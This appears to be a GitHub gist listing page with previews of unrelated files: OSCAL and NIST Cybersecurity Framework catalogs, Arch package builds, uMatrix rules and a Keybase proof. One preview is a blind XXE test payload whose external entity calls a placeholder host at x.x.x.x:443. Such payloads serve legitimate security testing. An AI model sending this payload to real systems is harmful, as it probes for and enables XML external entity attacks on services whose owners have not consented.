block-beta
block:e:3
l["left"]
m("A wide one in the middle")
r["right"]
l["col 1"]
m("col 2")
r["col 3"]
end
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"uuid": "d74dc2ba-eb2e-44b7-93e2-457076506395", | |
"metadata": { | |
"title": "Cloud Native Security Controls Catalog", | |
"published": null, | |
"last_modified": "2023-03-14T18:07:44.230+00:00", | |
"version": "0.0.1", | |
"oscal_version": "1.0.2", | |
"revisions": null, | |
"document_ids": null, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<catalog uuid="382c2910-3f85-40d1-9724-7180fdabcc24" | |
xmlns="http://csrc.nist.gov/ns/oscal/1.0" | |
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | |
xsi:schemaLocation="http://csrc.nist.gov/ns/oscal/1.0 https://raw.githubusercontent.com/usnistgov/OSCAL/v1.0.4/xml/schema/oscal_complete_schema.xsd"> | |
<metadata> | |
<title>NIST Cybersecurity Framework</title> | |
<last-modified>2023-02-18T12:47:36.496-05:00</last-modified> | |
<version>1.1</version> | |
<oscal-version>1.0.4</oscal-version> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Maintainer: Al S < [email protected]> | |
pkgname=imdone-bin | |
_pkgname=imdone | |
pkgver=1.17.6 | |
pkgrel=1 | |
pkgdesc="Simple and powerful kanban board that works on top of a local folder of plain text markdown files or code." | |
arch=('i686' 'x86_64') | |
provides=('imdone') | |
url="https://imdone.io/" | |
license=('custom:imdone') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
class SecurityAssessment extends SecurityAssessmentPlanSAP {} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https-strict: * true | |
matrix-off: about-scheme true | |
matrix-off: behind-the-scene true | |
matrix-off: chrome-extension-scheme true | |
matrix-off: chrome-scheme true | |
matrix-off: localhost true | |
matrix-off: opera-scheme true | |
referrer-spoof: * true | |
ua-spoof: * true | |
* * * block |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https-strict: * true | |
matrix-off: about-scheme true | |
matrix-off: behind-the-scene true | |
matrix-off: chrome-extension-scheme true | |
matrix-off: chrome-scheme true | |
matrix-off: localhost true | |
matrix-off: opera-scheme true | |
referrer-spoof: * true | |
* * * block | |
* * css allow |
I hereby claim:
- I am xee5ch on github.
- I am ay5lee4k (https://keybase.io/ay5lee4k) on keybase.
- I have a public key whose fingerprint is FE39 2A56 BF95 E9B5 E14B CA6D 3729 EB09 8C25 62FF
To claim this, I am signing this object:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Maintainer: megadriver <megadriver at gmx dot com> | |
pkgname=xonsh-git | |
_gitname=xonsh | |
pkgver=0.2.6.r5.g54a11e7 | |
pkgrel=1 | |
pkgdesc="A Python-ish, BASHwards-compatible shell" | |
url="http://github.com/scopatz/xonsh" | |
arch=('any') | |
license=('FreeBSD') |
NewerOlder